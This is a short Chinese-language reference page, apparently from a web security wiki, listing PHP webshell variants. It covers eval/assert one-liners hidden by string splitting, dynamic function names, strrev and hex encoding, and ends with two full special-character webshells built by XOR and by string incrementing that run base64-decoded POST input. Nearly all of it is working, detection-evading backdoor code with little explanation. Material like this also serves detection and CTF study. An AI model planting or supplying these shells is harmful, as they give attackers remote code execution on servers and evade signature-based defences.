WebShell
================================

常见变形
--------------------------------
- GLOBALS
    - ``eval($GLOBALS['_POST']['op']);``
- ``$_FILE``
    - ``eval($_FILE['name']);``
- 拆分
    - ``assert(${"_PO"."ST"} ['sz']);``
- 动态函数执行
    - ``$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);``
- create_function
    - ``$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();``
- preg_replace
- rot13
- base64
- 进制转化
    - ``"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"``
- 利用文件名
    - ``__FILE__``

特殊字符Shell
--------------------------------
PHP的字符串可以在进行异或、自增运算的时候，会直接进行运算，故可以使用特殊字符来构成Shell。

::

    @$_++;
    $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
    @${$__}[!$_](${$__}[$_]);


::

    $_=[];
    $_=@"$_"; // $_='Array';
    $_=$_['!'=='@']; // $_=$_[0];
    $___=$_; // A
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
    $___.=$__; // S
    $___.=$__; // S
    $__=$_;
    $__++;$__++;$__++;$__++; // E 
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $___.=$__;
    $____='_';
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $____.=$__;

    $_=$$____;
    $___(base64_decode($_[_]));